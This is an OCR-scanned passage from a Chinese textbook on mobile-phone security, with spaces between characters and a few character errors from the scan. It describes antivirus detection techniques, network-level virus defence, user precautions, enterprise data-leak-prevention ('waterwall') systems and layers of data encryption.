可 信和 通路 特征 。 对 于 无 线 连接 (蓝牙 红外、WLAN 等 ), 默 认 属 性 应 设 为 隐藏 或 者 
关闭 以 防 非法 连接 ; 在 需要 实际 连接 时 ,应 有 安全 认证 能 力 , 对 所 有 请 求 连接 进行 
身份 认证 ; 所 有 外 部 连接 发 起 都 要 有 相应 提示 ,智能 手机 有 权 选 择 是 否 接受 该 连 
接 ; 具体 进行 数据 传输 的 时 候 ,需要 有 防 病毒 功能 来 检查 相应 的 安全 连接 。 


2) 安装 手机 防 病毒 软件 

安全 永远 是 相对 的 ,没有 绝对 的 安全 ,因此 手机 防 病毒 软件 成 了 保证 智能 手机 安全 的 必 
要 条 件 。 

随 着 手机 杀毒 软件 日 渐 受 到 重视 ,目前 国内 外 专业 计算 机 杀毒 厂商 纷纷 推出 手机 版 的 
杀毒 软件 。 由 于 手机 操作 系统 的 多 样 性 ,各 个 杀毒 厂商 可 以 针对 不 同 的 手机 、 不 同 的 操作 系 
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统 开发 出 不 同 版 本 的 杀毒 软件 ,但 至 少 应 满足 以 下 要 求 , 才 具 备查 杀手 机 病毒 的 基本 功能 : 

。 全 盘 扫 描 功能 。 

。 实时 监控 功能 。 

。 文件 系统 监控 功能 。 

。 文件 修复 功能 。 

。 日 志 功 能 。 

。 病毒 库 更 新 等 。 

现在 主流 的 反 病 毒 软件 都 能 通过 遍历 手机 中 的 文件 来 实时 监测 程序 运行 情况 。 一 旦 发 
现 可 疑 程序 , 反 病毒 软件 会 采取 隔离 或 查 杀 的 方式 来 保障 手机 安全 。 随 着 反 病毒 软 件 的 发 
展 ,一 般 的 病毒 带 来 的 危害 已 大 为 降低 。 

目前 智能 手机 病毒 的 检测 方法 源 于 计算 机 系统 的 安全 软件 防护 思路 ,通过 对 系统 内 运 
行程 序 的 编码 特征 .运行 方式 及 行为 模式 等 进行 分 析 , 以 实现 预警 、 查 杀 , 从 而 保障 系统 的 安 
全 性 。 检 测 方法 如 下 : 

(1) 基于 特征 码 的 检测 方法 。 

基于 特征 码 的 检测 方法 是 目前 主流 手机 病毒 检测 方式 ,其 原理 是 将 手机 里 的 文件 通过 
扫描 引擎 与 病毒 库 进行 特征 码 匹配 。 如 有 匹配 一 致 的 代码 特征 , 则 判断 为 手机 病毒 。 

特征 码 检测 法 的 优点 是 : 检测 时 间 短 ,检测 准确 率 高 ,可 以 直接 在 检测 后 进行 杀毒 处 
理 。 这 种 方法 的 缺点 是 : 无 法 发 现 未 知 的 手机 病毒 ,需要 进行 病毒 样本 的 全 量 捕获 ,单机 需 
要 及 时 更 新 病毒 库 。 

(2) 基于 启发 式 扫 描 或 行为 分 析 的 检测 方法 。 

启发 式 扫描 的 方法 是 分 析 文 件 的 逻辑 架构 来 判断 其 是 否 为 疑似 病毒 。 行 为 分 析 方法 是 
监测 程序 文件 的 逻辑 行为 来 判断 其 是 否 为 疑似 病毒 。 

启发 式 扫描 和 行为 分 析 法 的 优点 是 可 以 发 现 病毒 库 中 没有 的 、 新 的 手机 病毒 ,不 需要 频 
繁 更 新 手机 病毒 库 ,检测 范围 广 。 其 缺点 是 会 产生 误 报 。 

(3) 校 验 和 查 毒 技术 。 

在 通信 中 ,通常 用 校 验 和 来 保证 数据 的 准确 性 和 完整 性 ,这 在 病毒 防御 和 防治 方面 应 用 
也 非常 广泛 。 由 于 一 些 手机 病毒 的 隐藏 特性 ,会 使 文件 的 日 期 或 大 小 发 生变 化 ,所 以 可 以 引 
入 校 验 和 查 毒 技术 。 

这 种 技术 的 思想 是 : 事先 保存 没有 被 感染 的 文件 校 验 和 ,然后 定期 把 目前 文件 的 校 验 
和 与 保存 下 来 的 正常 文件 的 校 验 和 进行 比较 .看 是 否 一 致 。 这 种 技术 可 以 简单 粗略 地 检查 
病毒 是 否 存在 ,但 有 时 会 发 生 误 报 。 

3) 虚拟 机 查 毒 技术 

利用 虚拟 机 的 查 杀 毒 软件 仿真 一 个 虚拟 机 ,虚拟 机 通过 运行 备查 程序 来 营造 一 个 不 真 
实 的 .可 控制 的 、. 易 观察 的 环境 ,所 有 备查 的 文件 都 运行 在 这 个 封闭 的 模拟 环境 中 ,杀毒 软件 
通过 观察 程序 运行 过 程 中 呈现 的 特征 来 判断 被 检查 的 文件 是 不 是 病毒 。 尽 管 这 项 技术 实现 
起 来 较为 困难 ,但 它 在 反 病 毒 软件 中 具有 很 多 优点 ,也 取得 了 很 大 的 成 功 。 

目前 手机 防 病毒 软件 在 市 场 推广 上 还 有 一 定 的 问题 。 一 方面 ,手机 平台 太 多 ,要 开发 出 
通用 的 防 病毒 软件 比较 困难 。 另 一 方面 .手机 病毒 有 一 定 的 针对 性 ,通常 某 种 病毒 只 在 某 款 
手机 上 发 作 。 这 两 方面 结合 在 一 起 造成 手机 病毒 软件 的 开发 成 本 较 高 。 而 手机 病毒 传播 迅 
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速 , 对 防 病毒 软件 更 新 周期 提出 了 极 高 的 要 求 。 

首先 ,手机 杀毒 软件 厂商 和 手机 厂商 应 寻求 一 个 统一 的 标准 ,让 杀毒 软件 适用 于 所 有 型 
号 的 智能 手机 ; 其 次 ,运营 商 应 建立 一 个 病毒 发 布 机 制 ,提醒 用 户 及 时 进行 杀毒 软件 的 更 
新 ; 最 后 ,应 该 设置 一 个 专业 的 机 构 专门 对 手机 防 病毒 软件 进行 检测 认证 ,这 样 才能 促进 智 
能 手机 安全 的 发 展 。 

2. 在 移动 通信 网 络 设备 处 进行 防范 

与 互联 网 无 纪律 的 特点 不 同 ,移动 通信 网 是 一 个 受到 严格 管理 的 网 络 , 可 以 充分 发 挥 这 
一 特点 ,将 手机 病毒 的 防护 重点 放 在 网 络 层 面 上 来 实现 。 因 为 大 部 分 手机 病毒 的 传播 方式 
需要 依靠 移动 通信 网 络 ,所 以 最 直接 有 效 的 办 法 应 该 是 由 运营 商 提 供 从 网 络 接 和 控制 到 应 
用 服务 控制 的 多 层 安全 控制 手段 ,进行 网 络 查 毒 . 杀 毒 和 防毒 。 可 以 在 移动 网 络 设备 处 ( 例 
如 GGSN ,彩信 网 关 .WAP 网 关 等 ) 对 网 络 行为 和 信息 内 容 采用 安全 审计 、 深 度 报 文 检 测 等 
技术 ,实现 对 敏感 信息 的 保护 和 有 害 行为 的 及 时 发 现 和 过 滤 , 确 保 传送 的 内 容 安 全 可 靠 ,并 
及 时 封 堵 攻击 来 源 , 把 危害 降 到 最 低 。 

如 果 能 够 建立 起 用 户 终端 ,移动 网 络 和 应 用 服务 提供 者 /内 容 提供 商 之 间 的 联动 防御 模 
式 ( 如 图 7.4 所 示 ), 则 可 以 更 好 地 提高 整个 移动 网 络 的 病毒 防范 能 力 。 
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7.4 联动 防御 模式 


首先 ,网 络 接 人 控制 (移动 网 络 ) 可 以 与 应 用 服务 提供 者 (应 用 服务 器 ) 的 控制 相互 联动 ， 
有 效 控制 网 络 蠕虫 .黑客 攻击 等 安全 风险 ,从 源头 上 阻止 那些 针对 特定 服务 的 攻击 所 带 来 的 
网 络 流量 冲击 .有 效 防 止 病毒 在 网 络 中 的 传播 。 

安全 代理 是 终端 的 一 部 分 , 当 接 入 网 络 的 时 候 ,安全 代理 负责 将 终端 自身 的 各 种 安全 特 
性 通过 空中 接口 发 送 给 安全 服务 器 ,安全 服务 器 根据 预先 设 定 的 安全 策略 进行 处 理 , 处 理 后 
的 结果 通过 相应 的 接口 发 送 给 访问 控制 服务 器 ,访问 控制 服务 器 再 根据 这 个 处 理 结果 对 终 
端的 各 种 业务 请 求 进行 接 入 处 理 。 也 就 是 说 ,终端 在 请 求 某 种 业务 时 ,要 根据 自身 的 安全 特 
性 的 处 理 结果 来 进行 ,如 果 自 身 的 安全 特性 不 能 满足 申请 的 业务 , 则 发 起 的 业务 将 会 失败 。 

3. 提高 手机 用 户 的 防 病 毒 意识 

如 果 用 户 发 觉 自己 手机 耗 电量 突然 增 大 ,莫名 其 妙 地 经 常 自动 开关 机 ,系统 反应 缓慢 ， 
手机 话费 突然 非 正 常 增加 ,自动 联网 ,以 及 出 现 奇 怪 的 英文 字符 ,都 有 可 能 是 感染 了 病毒 。 

用 户 应 该 正确 使 用 手机 上 网 ,提前 预防 ,也 可 以 有 效 防范 手机 安全 问题 。 

(1) 不 接受 陌生 请 求 ,随时 删除 可 疑 短 信 或 彩信 ,即使 是 熟悉 的 电话 发 来 的 彩信 消息 ， 
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或 者 是 从 熟悉 的 地 址 发 来 的 邮件 ,其 中 附带 的 安装 程序 也 可 能 携带 病毒 。 

(2) 最 好 不 浏览 危险 网 站 ,保证 下 载 的 安全 性 ,不 要 下 载 和 安装 非法 软件 ,确认 手机 下 
载 站 点 的 安全 性 ,不 要 运行 任何 来 源 不 明 的 程序 。 平 时 尽量 关闭 手机 蓝牙 功能 ,使 用 蓝牙 设 
备 时 将 其 属性 设 为 隐藏 ,以 防 被 病毒 搜索 到 。 尽 量 避 免 使 用 配对 功能 。 

(3) 最 好 能 够 安装 正规 的 手机 防毒 软件 。 通 过 防毒 软件 来 过 滤 收 到 的 信息 (短信 、 彩 信 
和 邮件 等 ) 和 下 载 的 文件 ,对 其 内 容 进行 病毒 查 杀 ,防止 有 害 的 程序 安装 到 手机 上 。 目 前 , 针 
对 市 场 上 流行 的 智能 操作 系统 ,业界 已 经 推出 了 许多 防毒 软件 ,这 些 软 件 可 以 通过 正规 手机 
卖场 下 载 安装 ,也 可 以 通过 软件 商 的 官方 网 站 下 载 安装 。 

(4) 谨防 二 维 码 。 二 维 码 具有 隐蔽 性 ,使 得 用 户 通 过 手机 扫描 时 ,无 法 辨别 下 载 链接 的 
来 源 是 否 安全 , 极 易 下 载 到 恶意 软件 并 中 毒 。 目 前 ,二 维 码 逐 渐 成 为 恶意 软件 的 入侵 新 途 
径 , 手 机 用 户 应 该 养 成 良好 的 安全 使 用 习惯 ,不 要 见 码 就 扫 。 

(5) 如 果 有 官方 提供 的 加 密 网 络 , 则 手机 用 户 在 上 网 时 就 应 该 尽量 选择 这 一 网 络 。 例 
如 在 香港 ,当地 政府 的 免费 WiFi 有 freegoWi-Fi 和 freegoWi-Fi-e 两 种 网 络 , 后 者 采用 加 密 
的 WPA/WPA2 技术 ,使 用 起 来 更 加 安全 。 





7.3 敏感 信息 防 泄露 技术 


移动 应 用 与 个 人 工作 和 生活 的 关系 越 来 越 紧密 ,用 户 从 中 获取 便利 的 同时 ,很 多 是 以 牺 
牲 个 人 隐私 信息 为 代价 的 。 部 分 服务 提供 商 或 黑客 在 用 户 不 知道 的 情况 下 获取 用 户 通 讯 
录 、 短 信 、 活 动 范围 等 隐私 信息 ,会 给 用 户 埋 下 很 大 的 安全 隐患 。 


7.3.1 数据 泄露 原因 分 析 


移动 通信 的 服务 过 程 中 会 产生 大 量 的 用 户 信息 ,如 位 置信 息 、 通 信 信 息 与 消费 偏好 、 用 
户 联系 人 信息 、 业 务 应 用 订购 关系 信息 、 用 户 上 网 轨迹 信息 、 用 户 支 付 信 息 、 用 户 鉴 权 信息 
等 。 这 些 信息 通常 会 保存 在 移动 互联 网 的 业务 数据 库 中 ,移动 互联 网 的 发 展 要 求 将 部 分 信 
息 开 放出 来 ,通过 互联 网 应 用 网 关 进 行 调用 ,从 而 方便 地 开发 出 移动 互联 网 应 用 。 

合法 的 服务 提供 商 为 拓展 业务 或 其 他 目的 ,可 以 通过 正常 的 渠道 精确 地 提取 这 些 信 息 ， 
进行 一 定 的 分 析 。 这 些 公司 本 身 一 般 不 会 做 违法 的 事情 ,但 是 却 不 能 保证 公司 内 部 人 员 都 
能 够 拒绝 高 额 利 益 的 引诱 ,当前 很 多 用 户 信息 泄露 案例 都 是 源 于 这 种 原因 。 如 果 缺 乏 有 效 
的 开放 与 管控 机 制 ,将 导致 大 量 的 用 户 信息 被 滥用 ,使 用 户 隐私 保护 面临 巨大 的 挑战 ,甚至 
会 出 现 不 法 分 子 利 用 用 户 信息 进 行 违法 犯罪 活动 。 

从 政策 上 来 讲 , 国 家 急需 对 这 方面 进行 立法 ,严惩 那些 不 法 员工 的 泄露 行为 。 从 技术 上 
来 讲 , 可 以 通过 企业 级 防水 墙 进行 控制 。 

另外 ,移动 应 用 都 会 将 部 分 用 户 信息 存储 在 内 部 存储 空间 或 外 部 存储 空间 中 。 如 果 存 
储 空间 权限 限制 不 够 严格 ,会 导致 恶意 软件 对 存储 数据 的 任意 读 取 、 复 改 或 恶意 窃取 。 

除了 以 上 软件 造成 信息 泄露 的 危险 ,用 户 自身 的 使 用 习惯 也 会 导致 信息 的 泄密 。 如 果 
用 户 将 一 些 重要 的 个 人 信息 保存 在 移动 终端 的 存储 空间 中 ,也 会 被 恶意 软件 获取 。 当 移动 
终端 丢失 时 ,这 些 数据 会 被 轻易 地 泄露 。 
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加 密 一 向 是 安全 领域 内 重要 的 手段 ,对 重要 信息 进行 加 密 是 一 个 良好 的 习惯 ,而 未 进行 
加 密 ( 或 加 密 技术 过 于 简单 ) 的 移动 应 用 /数据 面临 着 被 破解 的 风险 ,造成 源 代码 、 配 置 文件 、 
资源 文件 甚至 个 人 信息 等 重要 信息 的 泄露 。 建 议 用户 对 自己 的 手机 进行 加 密 , 如 锁 屏 加 密 、 
指纹 加 密 、 开 启 隐 私 保护 等 等 。 

移动 应 用 大 多 需要 通过 网 络 协 议 与 服务 器 进行 交互 ,由 于 移动 设备 通过 开放 性 的 网 络 
进行 连接 ,因此 存在 被 协议 抓 包 的 风险 , 易 造成 敏感 信息 被 获取 及 自 改 。 被 破解 的 移动 应 用 
不 仅 面临 着 敏感 信息 被 打包 发 给 不 法 分 子 ,进而 被 泄露 的 风险 ,而 且 还 面临 着 植 和 恶意 代 
码 ,资源 替换 、 自 改 , 重 签名 及 盗版 等 风险 。 

对 于 信息 外 汇 的 通信 过 程 , 有 关 研 究 设 计 了 个 人 版 防水 墙 的 思想 ,对 移动 站 的 外 发 数据 
进行 过 滤 , 仅 允许 那些 符合 规则 的 数据 包 通 过 并 发 送 到 网 络 上 。 另 外 ,建议 移动 用 户 尽量 减 
少 在 网 络 上 的 经 济 行为 ,用 户 还 可 以 自己 设 定 一 些 安全 限制 措施 ,例如 支付 宝 只 关联 一 个 有 
限 金额 的 金融 卡 等 。 

有 关 专 家 对 大 量 用 户 遭 遇 的 恶意 软件 进行 了 为 期 一 年 的 追踪 调研 ,发 现 了 恶意 软件 最 
喜爱 的 15 个 侵犯 行为 ,其 中 包括 打开 摄像 头 、 话 简 等 设备 ,这 会 对 用 户 的 隐私 造成 一 定 的 威 
胁 。 用 户 应 该 时 刻 注意 手机 的 设备 运行 情况 。 目 前 存在 一 些 相关 软件 ,可 以 对 这 些 设备 进 
行 监控 ,除了 白 名 单 所 规定 的 那些 应 用 ,防护 软件 将 对 其 他 所 有 访问 这 些 设备 的 应 用 予以 
拦截 。 


7.3.2 企业 防水 墙 


对 于 合法 公司 内 部 不 法 员工 的 信息 泄露 ,可 以 采用 防水 墙 的 思想 来 防范 。 防 水 墙 是 从 
防火 墙 的 概念 演变 出 来 的 ,防火 墙 是 防止 外 部 威胁 向 内 部 延伸 ,而 防水 墙 是 防止 信息 从 内 部 
向 外 部 扩散 。 即 防水 墙 系统 是 用 来 保护 用 户 的 敏感 信息 不 被 非法 外 传 ,防止 泄密 事件 发 生 ， 
从 而 保证 内 部 的 安全 。 

防水 墙 时 刻 监控 内 部 计算 机 的 运行 状况 ,特别 是 安全 状况 ,是 用 来 加 强 信息 系统 内 部 安 
全 的 重要 工具 。 

具体 来 说 ,防水 墙 技 术 是 一 个 内 网 数据 保护 技术 , 它 以 内 网 安全 理论 为 基础 ,以 数据 安 
全 为 核心 ,利用 密码 学 技术 .PKI 技术 、 操 作 系统 核心 技术 .权限 控制 .审计 跟踪 技术 等 技术 
手段 ,对 涉 密 信息 、 重 要 业务 数据 、 技 术 专 利 等 敏感 信息 的 存储 、 传 播 和 处 理 过 程 实施 安全 限 
制 保护 ,最 大 限度 地 防止 敏感 信息 外 泄 。 

利用 防水 墙 技术 可 以 很 好 地 在 事前 、 事 中 、 事 后 对 内 网 的 数据 安全 进行 全 面 防护 ,与 防 
火 墙 .IDS、 防 病毒 软件 等 一 同 构筑 内 网 数据 安全 屏障 。 

防水 墙 一 般 具 备 五 大 功能 : 

*。 失 /泄密 防护 。 针 对 网 络 传输 、 移 动 存储 设备 带 出 和 打印 到 纸 质 文稿 这 3 种 泄密 途 

径 作 全 面 的 防护 ,并 记录 日 志 或 文件 以 备 事后 追踪 。 

。 文件 安全 服务 。 提 供 对 敏感 文件 的 安全 防护 ,通常 引入 加 密 域 的 概念 。 加 密 域 是 一 
组 防水 墙 系统 用 户 的 组 合 ,每 个 文件 在 加 密 时 均 选 择 加 密 域 ,只 有 处 于 选择 域内 的 
用 户 才 能 进行 解密 查看 ,这样 可 以 有 效 地 防止 文件 在 传输 途中 可 能 造成 的 泄密 。 

。 运行 状况 监控 。 记 录 受 控 主 机 的 运行 状况 历史 日 志 , 以 便 审计 和 监控 ,这 也 是 计算 
机 安全 保密 的 有 效 措施 之 一 。 
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。 系统 资源 管理 。 收 集 受 控 主机 上 的 软 硬 件 信息 ,并 上 传 至 服务 器 作为 初始 资源 信息 
备份 。 
。 扩展 身份 认证 。 可 接管 Windows 身份 认证 ,如 果 采 用 ,只 需 输入 合法 的 防水 墙 用 户 
名 和 口令 即 可 登录 Windows 系统 。 
完整 的 防水 墙 系统 应 由 3 部 分 组 成 , 即 防水 墙 服务 器 、 防 水 墙 控制 台 、 防 水 墙 客户 端 。 
防水 墙 系统 如 图 7. 5 所 示 ,防水 墙 服务 器 和 防水 墙 控制 器 部 署 在 防火 墙 后 。 管 理 员 通 
过 管理 防水 墙 服务 器 ,制定 和 实施 相关 的 安全 策略 ,并 强制 分 发 到 各 个 客户 端 ( 受 控 工 作 
站 )。 防 水 墙 服务 器 通过 位 于 各 部 门 的 客户 端 来 实现 对 整个 内 部 网 络 的 用 户 .数据 和 设备 的 
管理 和 监控 。 
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图 7.5 防水 墙 系统 示意 图 


防水 墙 服务 器 包括 服务 器 端 软件 和 数据 库 ,是 防水 墙 系统 的 核心 部 分 。 它 通过 安全 认 
证 机 制 ,建立 起 与 多 个 客户 端 ( 受 控制 的 个 人 计算 机 ) 系 统 的 连接 ,实现 对 多 个 客户 端 系统 的 
配置 .策略 制定 ,资产 管理 .操作 审计 等 功能 。 服 务 器 功能 如 下 : 

。 存储 系统 组 织 结构 信息 ,控制 台 用 户 信 息 和 系统 工作 配置 参数 。 

。 存储 各 客户 端 代理 用 户 信 息 、 加 密 密 钥 。 

。 存储 策 略 , 并 接收 控制 台 的 指令 向 客户 端 代理 下 发 策略 。 

。 存 储 客户 端 代理 上 传 的 日 志 信 息 , 备 份 数 据 文件 ,并 且 备 份 的 数据 文件 应 采用 对 应 

的 客户 端 用 户 密 钥 加 密 后 再 进行 存储 。 
。 接收 控制 台 用 户 数据 请 求 指令 ,传送 数据 文件 到 控制 台 , 由 控制 台 进行 解密 、 查 看 和 
分 析 。 

防水 墙 控制 台 ( 防 水 墙 管理 工作 站 ) 是 系统 管理 员 ,操作 员 、 审 计 员 等 和 防水 墙 系统 交互 
控制 的 图 形 界 面 ,实现 系统 管理 .参数 配置 .策略 管理 和 系统 审计 等 功能 。 控 制 台 采 用 权限 
分 级 的 授权 模式 ,严格 限制 对 敏感 信息 的 访问 权限 ,以 提高 系统 的 安全 性 ,保证 信息 安全 。 
其 功能 如 下 : 

。 管 理 控制 台 用 户 , 包 括 添加 、 删 除 和 修改 等 操作 ; 控制 台 用户 采 用 权限 分 级 方式 ,每 

个 用 户 只 能 拥有 属于 自己 的 授权 工作 范围 和 管理 权限 。 
。 安全 工作 域 结构 管理 ,包括 创建 组 织 结构 层次 以 及 添加 、 删 除 系统 组 织 结构 。 
。 管理 密 钥 , 生 成 .导入 和 导出 客户 端 代 理 的 密 钥 对 。 
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。 客户 端 代理 的 添加 和 印 载 , 客 户 端 代理 策 略 的 配置 和 下 发 。 
。 管理 服务 器 数据 库 , 包 括 备份 和 恢复 操作 。 
* 监测 日 志 的 查看 .分析 和 审计 ,生成 报表 。 
。 客户 端 代理 黑匣子 的 导入 审计 和 分 析 。 
防水 墙 客户 端 安装 于 受 监控 主机 上 的 检测 软件 ,强制 执行 来 自 服务 器 的 安全 策略 ,根据 
安全 策略 检测 客户 端 用 户 的 行为 。 客 户 端 软件 采用 了 严密 措施 ,防止 本 地 用 户 自行 种 载 关 
闭 监控 程序 。 客 户 端 代理 主要 功能 如 下 : 
。 如 果 本 机 地 址 已 在 服务 器 端 注册 ,可 向 服务 器 注册 主 用 户 。 
。 主 用 户 可 以 对 主机 的 使 用 进行 授权 ,添加 若干 个 辅助 用 户 。 
。 接收 服务 器 下 发 的 策略 ,并 采用 该 策略 控制 客户 端 代理 的 工作 模式 。 
。 信息 泄露 防护 ,包括 网 络 层 、 应 用 层 媒体 介质 和 打印 机 等 信息 泄露 防护 。 
"运行 监测 ,实时 记录 文件 的 删除 `. 重 命名 ,记录 进程 .服务 .驱动 ,用户 和 组 的 变化 
情况 。 
。 资源 获取 ,接收 防水 墙 服务 器 指令 ,上 传 系统 的 软件 、 硬 件 信 息 。 
*。 文件 安全 服务 ,加 密 目 标 文件 ,指定 密 文 发 放 范围 并 将 加 密 日 志 上 传 至 服务 器 ; 解 
密 授 权 密 文 ,同时 向 服务 器 发 送 文件 解密 日 志 。 


7.3.3 加 密 防 范 


为 了 实现 对 数据 的 安全 保护 ,通常 采用 加 密 技 术 对 关键 数据 进行 加 密 处 理 。 数 据 加 密 
技术 是 最 基本 的 网 络 安全 技术 ,被 誉 为 信息 安全 的 核心 ,最 初 主要 用 于 保证 数据 在 存储 和 传 
输 过 程 中 的 保密 性 。 

加 密 类 技术 是 较为 传统 的 数据 防护 技术 ,其 主要 理念 是 将 数据 的 二 进 制 存储 转 为 密 文 ， 
能 够 简单 有 效 地 解决 数据 的 存储 安全 问题 。 加 密 类 技术 根据 在 数据 安全 防护 领域 中 的 应 用 
可 细 分 为 文件 级 加 密 技术 、 磁 盘 级 加 密 技 术 、 硬 件 级 加 密 技 术 、 网 络 级 加 密 技术 。 

1. 文件 级 加 密 技 术 

文件 级 加 密 技术 是 目前 使 用 最 为 广泛 的 数据 安全 解决 方案 ,该 技术 的 优点 是 开发 难度 
低 , 用 户 使 用 简单 。 

目前 文件 级 加 密 技术 最 新 型 的 应 用 称 为 透明 加 解密 ,含义 是 指 用 户 在 操作 过 程 中 ,不 改 
变 对 文件 的 访问 (打开 或 关闭 ) 习 惯 ,整个 加 密 ( 解 密 ) 操 作 过 程 是 自动 完成 的 ,用 户 无 须 显 式 
地 指明 算法 、 密 钥 和 要 操作 的 文件 名 。 该 技术 是 为 了 减少 用 户 对 加 解密 过 程 和 密 钥 管理 的 
关注 ,从 而 减轻 用 户 的 负担 ,用 户 不 必 每 次 输入 密码 ,以 及 记 住 每 次 使 用 的 密 钥 。 

透明 加 解密 主要 是 通过 建立 应 用 程序 的 进程 和 相应 文件 之 间 的 关联 来 达到 对 特定 文件 
数据 加 密 的 目的 ,文档 透明 加 解密 系统 能 够 自动 地 用 指定 的 加 密 ( 解 密 ) 算 法 和 指定 的 密 钥 
对 指定 的 文件 实行 加 密 和 解密 操作 ,其 加 解密 过 程 对 用 户 透明 。 

密 钥 管理 通常 由 密 钥 生成 .分 发 和 存储 等 过 程 组 成 ,但 是 在 透明 加 密 方式 中 ,用 户 无 须 
关心 这 个 过 程 。 透 明 加 解密 所 用 到 的 算法 、 密 钥 是 事先 设 定 的 、 存 储 在 系统 的 环境 变量 中 ， 
而 不 是 在 加 密 ( 解 密 ) 过 程 中 指定 的 。 系 统 根据 加 密 策 略 自动 识别 哪些 文件 需要 进行 加 解密 
操作 ,哪些 不 需要 。 

但 是 ,由 于 该 技术 的 实现 机 制 所 限 ,决定 了 文件 是 否 加 密 主 要 取决 于 应 用 程序 和 文件 的 
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关联 关系 ,从 而 导致 了 安全 系统 与 应 用 程序 的 具体 实现 密切 相关 ,兼容 性 较 差 , 甚 至 有 可 能 
出 现 数 据 被 破坏 的 情况 。 

文档 透明 加 解密 系统 需要 运行 于 操作 系统 的 核心 态 ,接管 文件 系统 ,将 文件 数据 以 密 文 
形式 存储 在 存储 设备 (例如 磁盘 ) 上 , 当 需 要 读 写 该 加 密 文 件 时 ,利用 指纹 识别 技术 和 文件 名 
识别 技术 对 文件 实时 进行 加 解密 。 

透明 加 解密 保证 在 存储 介质 上 的 文件 始终 处 于 加 密 状 态 。 其 工作 原理 如 图 7.6 所 示 。 
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图 7.6 透明 加 解密 的 原理 


其 中 ,安全 策略 由 管理 员 设 置 ,包括 安全 进程 和 安全 文档 之 间 的 关联 ,策略 即时 下 发 到 
客户 端 ,客户 端 将 策略 设置 到 内 核 驱动 程序 中 ， 
当 客户 端 用 户 打开 安全 文档 时 ,系统 在 验证 用 户 合法 身份 与 权限 后 ,会 在 内 核 中 自动 解 
密 ,应 用 程序 读 到 的 内 存 数据 就 已 经 解密 为 明文 了 。 
当 安全 应 用 程序 新 创建 一 个 文件 或 者 往 一 个 加 密 文档 中 写 人 时 , 则 在 验证 用 户 合法 身 
份 与 权限 后 ,在 内 核 中 自动 加 密 , 写 人 硬盘 的 数据 已 经 自动 加 密 为 密 文 了 。 
透明 加 解密 有 以 下 特点 : 
。 强 制 性 加 解密 。 即 应 用 了 这 种 技术 的 电子 文档 安全 系统 会 强制 性 地 对 这 些 电子 文 
档 进行 加 解密 (保存 的 时 候 加 密 存 盘 , 打 开 的 时 候 解 密 打 开 ), 不 需要 由 终端 用 户 来 
判断 这 个 文档 是 否 需要 加 窗 。 
。 加 解密 过 程 相 对 透明 。 即 在 使 用 过 程 中 ,终端 用 户 平常 工作 时 几乎 不 会 感觉 到 加 解 
密 过 程 的 存在 ,还 是 双击 某 个 文档 后 自动 打开 ,选择 保存 菜单 命令 后 文件 就 被 保存 ， 
不 需要 用 户 考虑 加 解密 问题 。 
。 对 外 受阻 。 一 个 文件 一 旦 离开 使 用 环境 ,将 自动 失效 ,从 而 保护 文件 内 容 。 
文件 级 加 密 技术 还 会 涉及 密 文 检索 问题 。 密 文 检索 问题 是 指 用 户 访问 密 文 数据 时 可 以 
在 不 对 其 进行 解密 的 情况 下 检索 到 所 需 的 内 容 。 并 且 在 检索 过 程 中 不 会 泄露 任何 有 关 检索 
的 内 容 。 由 于 在 移动 终端 上 对 数据 进行 了 加 密 处 理 , 数 据 以 密 文 的 形式 保存 在 存储 服务 器 
中 ,使 得 对 于 密 文 数据 的 检索 变 得 较为 困难 。 
目前 已 知 的 密 文 检索 算法 包括 基于 关键 词 的 公 钥 检索 算法 、 线 性 搜索 算法 和 对 称 可 搜 
索 加 密 算法 等 ,这 类 算法 通常 都 需要 考虑 检索 的 准确 性 和 效率 。 
2. 磁盘 级 加 密 技术 
磁盘 级 加 密 技术 通过 相关 软件 在 磁盘 读 写 时 对 磁盘 扇 区 进行 加 解密 来 实现 ,该 技术 得 
免 了 与 应 用 程序 相关 的 限制 。 采 用 该 技术 的 数据 防 泄漏 方案 以 Windows Vista 中 集成 的 
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BitLocker 为 代表 。 但 是 ,单一 的 磁盘 加 密 技术 主要 适用 于 被 动 泄密 保护 需求 ,无 法 防止 通 
过 网 络 和 其 他 途径 的 主动 泄密 行为 ,这 一 弱点 极 大 地 限制 了 磁盘 级 加 密 技术 在 数据 防 泄密 
方面 的 应 用 。 

3. 硬件 级 加 密 技 术 

硬件 级 加 密 技 术 直 接 由 数据 的 存储 设备 提供 加 密 的 特性 ,最 具备 代表 性 的 是 希捷 
DriveTrust 技术 ,DriveTrust 利用 硬盘 与 计算 机 系统 中 其 他 组 件 完全 隔离 的 特点 ,提供 基于 
硬件 完全 功能 的 加 密 平台 。 在 系统 或 硬盘 丢失 ,被 盗 、 被 废弃 或 转 售 时 ,采用 DriveTrust 技 
术 的 硬盘 可 以 有 效 防止 未 经 授权 访问 其 中 存储 的 数据 。 但 是 这 类 技术 的 弱点 与 磁盘 级 加 密 
技术 相同 ,对 于 通过 计算 机 网 络 等 途径 的 主动 泄密 行为 无 法 进行 有 效 遏 制 。 

4. 网 络 级 加 密 技术 

网 络 级 加 密 技术 用 来 在 一 个 通信 模型 中 防止 攻击 者 窃取 传输 过 程 中 的 机 密 信息 , 它 通 
常 与 其 他 加 解密 技术 结合 使 用 ,用 于 保障 数据 在 网 络 传输 时 的 安全 。 

在 安全 通信 模型 中 ,发 送 者 和 接收 者 共享 一 个 预先 分 配 的 对 称 密 钥 , 消 息 经 过 加 密 之 
后 ,在 公开 的 信道 上 传输 。 在 保证 密 钥 安 全 的 前 提 下 ,由 于 攻击 者 无 法 获得 密 钥 , 因 此 他 无 
法 解密 传输 中 被 加 密 的 消息 。 基 于 这 个 简单 模型 的 加 密 技术 在 传统 的 信息 安全 系统 中 为 消 
息 的 共享 提供 了 机 密 性 保证 。 

网 络 级 加 密 技 术 根 据 实现 层次 可 以 分 为 网 络 层 的 IPSec VPN 和 应 用 层 的 SSL 
VPN 等 。 

由 于 此 类 技术 无 法 对 通过 存储 介质 传递 的 数据 进行 保护 ,因此 通常 不 能 作为 完整 的 数 
据 防 泄露 解决 方案 ,而 需要 与 其 他 技术 结合 使 用 。 


7.3.4 安全 过 滤 


过 滤 类 技术 的 优点 是 不 需要 在 所 有 计算 机 终端 上 安装 防护 软件 ,而 是 在 内 网 的 出 口 ,也 
就 是 网 关 处 安装 内 容 过 滤 设 备 , 该 设备 可 以 分 析 计 算 机 网 络 中 常见 的 网 络 协议 (比如 
HTTP、POP3 FTP、 即 时 通信 等 ) ,并 且 对 上 述 协议 的 内 容 进 行 分 析 、. 过滤。 目前 较为 先进 
的 设备 可 以 识别 出 上 百 种 文件 格式 。 

